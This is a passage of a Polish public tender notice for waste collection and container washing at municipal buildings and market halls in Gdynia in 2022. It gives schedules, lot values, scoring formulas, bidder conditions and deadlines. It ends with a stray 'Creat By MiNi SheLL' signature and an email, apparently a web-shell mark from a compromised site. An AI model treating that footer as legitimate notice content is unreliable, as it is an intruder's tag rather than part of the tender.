w tygodniu do godz. 7:00<br/>4	worek	Szkło	1 raz w tygodniu do godz. 7:00<br/>5	0,12	Bio	1 raz w tygodniu do godz. 7:00<br/><br/>3)	Budynek przy ul. Zakręt do Oksywia 10 w Gdyni: <br/>L.p	Pojemniki o pojemności<br/> w m3	Rodzaj odpadu	Częstotliwość odbioru odpadów <br/>1	1,10	Zmieszane	2 razy w tygodniu do godz. 7:00<br/>2	1,10	Plastik	1 raz w tygodniu do godz. 7:00<br/>3	0,24	Bio	1 raz w tygodniu do godz. 7:00<br/>4	0,24	Szkło	1 raz w tygodniu do godz. 7:00<br/>5	1,10	Papier	1 raz w tygodniu do godz. 7:00<br/><br/>4)	Budynek przy ul. Morska 217 w Gdyni: <br/>L.p	Pojemniki o pojemności<br/> w m3	Rodzaj odpadu	Częstotliwość odbioru odpadów <br/>1	0,12	Zmieszane	2 razy w tygodniu do godz. 7:00<br/>2	worek	Plastik	1 raz w tygodniu do godz. 7:00<br/>3	worek	Papier	1 raz w tygodniu do godz. 7:00<br/>4	worek	Szkło	1 raz w tygodniu do godz. 7:00<br/>5	0,12	Bio	2 razy w miesiącu do godz. 7:00<br/><br/>W zakresie obowiązków Wykonawcy jest mycie i dezynfekcja kontenerów i pojemników, według poniższego harmonogramu:<br/>	kontener na odpady zmieszane 5-krotne umycie w terminie realizacji umowy, każdorazowo na podstawie uzgodnień z Zamawiającym;<br/>	pojemniki na odpady selektywne – o ile wystąpi potrzeba 1-krotne umycie w terminie realizacji umowy, na podstawie uzgodnień z Zamawiającym. Zamawiający może zrezygnować z umycia jednego z pojemników na rzecz innego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 35335,71 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W kryterium cena wg wzoru P(Co)=Cmin/Cb x 60pkt<br/>gdzie:<br/>P(Co) – Ilość przyznanych punktów w Kryterium Cena<br/>Cmin – najniższa cena wśród złożonych ofert nie podlegających odrzuceniu<br/>Cb – oferta badanej oferty<br/>	w kryterium „termin płatności” z deklarowanym terminem:<br/>a)Wymagany minimalny termin płatności – 21 dni: 0 punktów;<br/> b)Termin płatności – 25 dni: 20 punktów;<br/> c) Maksymalny termin płatności – 30 dni: 40 punktów; <br/>Liczba punktów zostanie wyliczona do dwóch miejsc po przecinku, bez zaokrąglania.<br/>Jako najkorzystniejsza zostanie wybrana oferta, która uzyska najwyższą łączną ilość punktów w obydwóch kryteriach spośród ofert nieodrzuconych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W zakresie usługi dla części IV zamówienia:<br/>1.	Wykonawca zobowiązany jest do systematycznego odbioru i wywozu odpadów komunalnych z następującego budynku/obiektu: <br/>Zespół Miejskich Hal Targowych w Gdyni (ul. Wójta Radtkego 36, 38, 40), rodzaj odpadów: <br/>a)	odpady zmieszane,<br/>b)	odpady selektywne<br/>2.	Odpady będą gromadzone przez Zamawiającego w następujących pojemnikach i odbierane przez Wykonawcę wg następującego harmonogramu: <br/>Zespół Miejskich Hal Targowych: <br/>A)	1 kontener o pojemności 15m3 (15.000 litrów) na odpady zmieszane z urządzeniem zgniatającym;<br/>Odbiór odpadów kontenera 15m3 będzie się odbywał zgodnie z poniższym harmonogramem:<br/>- od poniedziałku do soboty: od godz. 7:00 – jeden raz w ciągu dnia, <br/>B) 1 kontener o pojemności minimum 7m3 (7.000 litrów) na odpady selektywne (papier)<br/>	- od poniedziałku do piątku: od godz. 7:00 – jeden raz w ciągu dnia, <br/>	- w soboty odbiór dwukrotny: pierwszy odbiór do godz. 7:00, drugi odbiór od 12:00 do godz.14:00<br/>W zakresie obowiązków Wykonawcy jest mycie i dezynfekcja kontenerów i pojemników, według poniższego harmonogramu:<br/>-kontener na odpady zmieszane 10-krotne mycie w terminie realizacji umowy, każdorazowo na podstawie uzgodnień z Zamawiającym; - pojemniki na odpady selektywne – o ile wystąpi potrzeba 2-krotne umycie w terminie realizacji umowy, na podstawie uzgodnień z Zamawiającym. Zamawiający może zrezygnować z umycia jednego z pojemników na rzecz innego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 350000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W kryterium cena wg wzoru P(Co)=Cmin/Cb x 60pkt<br/>gdzie:<br/>P(Co) – Ilość przyznanych punktów w Kryterium Cena<br/>Cmin – najniższa cena wśród złożonych ofert nie podlegających odrzuceniu<br/>Cb – oferta badanej oferty<br/>	w kryterium „termin płatności” z deklarowanym terminem:<br/>a)Wymagany minimalny termin płatności – 21 dni: 0 punktów;<br/> b)Termin płatności – 25 dni: 20 punktów;<br/> c) Maksymalny termin płatności – 30 dni: 40 punktów; <br/>Liczba punktów zostanie wyliczona do dwóch miejsc po przecinku, bez zaokrąglania.<br/>Jako najkorzystniejsza zostanie wybrana oferta, która uzyska najwyższą łączną ilość punktów w obydwóch kryteriach spośród ofert nieodrzuconych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia (w zakresie każdej części) mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu o którym mowa w ROZDZIALE XI SWZ oraz spełniają warunek udziału w postępowaniu dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej jn.:<br/>1.	Wykonawca spełni warunek dla części I -IV postępowania, jeżeli wykaże, że:<br/>a)	Posiada zaświadczenie o wpisie do rejestru działalności regulowanej (prowadzonego przez Urząd Miasta w Gdyni) w zakresie odbioru odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Miasta Gdyni, obejmujące odpady o kodach nr 20 z grupy odpady komunalne łącznie z frakcjami gromadzonymi selektywnie tj. 20 01; 20 02 i 20 03.<br/>b)	Posiada wpis do rejestru podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami, (BDO) w zakresie kodów odpadów komunalnych, objętych przedmiotem zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ocena spełniania warunku w przypadku Wykonawców występujących wspólnie nastąpi na podstawie oświadczeń o których mowa w art. 125 (Załącznik nr 2 do SWZ) podpisanych i złożonych przez każdego z Wykonawców. Ponadto zgodnie z art. 117 ust. 4 ustawy PZP wykonawcy złożą w części formularza ofertowego oświadczenie, z którego będzie wynikać które usługi wykonają poszczególni Wykonawcy.<br/>W odniesieniu do warunków dotyczących posiadania uprawnień do prowadzenia działalności gospodarczej lub zawodowej, Wykonawca może polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane.<br/>W takim przypadku Wykonawca załącza do oferty podpisany przez podmiot udostępniający dokument „zobowiązanie podmiotu udostępniającego zasoby” stanowiący Załącznik nr 3 do SWZ oraz Oświadczenie podmiotu udostępniającego – art. 125 ust. 1 stanowiące Załącznik nr 4 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia niniejszy dokument składa każdy z Wykonawców. <br/>W przypadku, gdy Wykonawca zgodnie z art. 118 ustawy PZP polega na zdolnościach innych podmiotów udostępniających zasoby:<br/>a)	oświadczenie podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnienie warunków udziału w postępowaniu, w zakresie w jakim Wykonawca powołuje się na jego zasoby według wzoru stanowiącego Załącznik nr 3 do SWZ;<br/>b)	wypełnione zobowiązanie podmiotu udostępniającego zasoby– art. 125 ust. 1 stanowiące Załącznik nr 4 do SWZ.<br/>3)	w przypadku gdy Wykonawca zgodnie z art. 18 ust. 3 ustawy PZP składa w ofercie informacje stanowiące tajemnice przedsiębiorstwa, uzasadnienie, w którym wykaże, że przekazywane dokumenty są zastrzeżone<br/>W przypadku gdy dokumenty potwierdzające umocowanie do reprezentowania odpowiednio Wykonawcy, wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach, zwane dalej „dokumentami potwierdzającymi umocowanie do reprezentowania”, zostały wystawione przez upoważnione podmioty inne niż wykonawca, wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby lub podwykonawca, zwane dalej „upoważnionymi podmiotami”, jako dokument elektroniczny, przekazuje się ten dokument.<br/>W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna), Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy (np. lider konsorcjum). Pełnomocnikiem konsorcjum jest Wykonawca, który zaloguje się na swoim profilu Wykonawcy i składając ofertę w zakładce „Wykonawcy” doda pozostałych Wykonawców wpisując ich dane. Pełnomocnictwo, o którym mowa powyżej, powinno być w formie elektronicznej (czyli opatrzone podpisem kwalifikowanym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osób upoważnionych do reprezentowania Wykonawców oraz zostać przekazane w ofercie wspólnej Wykonawców. Pełnomocnik, o którym mowa powyżej, pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje, korespondencję itp. Wszelkie oświadczenia pełnomocnika Zamawiający uzna za wiążące dla wszystkich Wykonawców składających ofertę wspólną. Nie dopuszcza się uczestniczenia któregokolwiek z Wykonawców wspólnie ubiegających się o udzielnie zamówienia w więcej niż jednej grupie Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Niedopuszczalnym jest również złożenie przez któregokolwiek z Wykonawców wspólnie ubiegających się o udzielnie zamówienia, równocześnie oferty indywidualnej oraz w ramach grupy Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmiany umowy został szerzej opisany we wzorach umów dla części I-IV <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-18 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/zbilkgdynia/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-18 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający nie przewiduje:<br/>1.	wyboru najkorzystniejszej oferty z możliwością prowadzenia negocjacji,<br/>2.	możliwości składania ofert wariantowych,<br/>3.	zawarcia umowy ramowej,<br/>4.	zastosowania aukcji elektronicznej,<br/>5.	zwrotu kosztów udziału w postępowaniu,<br/>6.	wniesienia zabezpieczenia należytego wykonania umowy,<br/>7.	możliwości odbycia wizji lokalnej,<br/>8.	składania zamówień o których mowa w art. 214 ust. 1 pkt 7 i 8 ustawy PZP,<br/>9.	możliwości ubiegania się o udzielenie zamówienia wyłącznie przez wykonawców, o których mowa w art. 94 ustawy PZP,<br/>10.	wymogu lub możliwości złożenia ofert w postaci katalogów elektronicznych lub dołączenia katalogów elektronicznych do oferty,<br/>11.	obowiązku osobistego wykonania przez wykonawcę kluczowych zadań, zgodnie z art. 60 i art. 121 ustawy PZP.<br/>12.	sytuacji o których mowa w art. 65 ust. 1, art. 66 i art. 69 ustawy PZP<br/>13.	wymagań w zakresie zatrudnienia osób, o których mowa w art. 96 ust. 2 pkt. 2,<br/>14.	udzielania zaliczek na poczet wykonania zamówienia<br/><br/>Zgodnie z art. 257 ustawy Pzp Zamawiający może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki publiczne, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane.<br/><br/>Przygotowując ofertę, Wykonawca winien dokładnie zapoznać się z zawartością wszystkich dokumentów składających się na niniejszą specyfikację, którą należy odczytywać wraz z ewentualnymi modyfikacjami i zmianami wnoszonymi przez Zamawiającego.

Creat By MiNi SheLL
Email: jattceo@gmail.com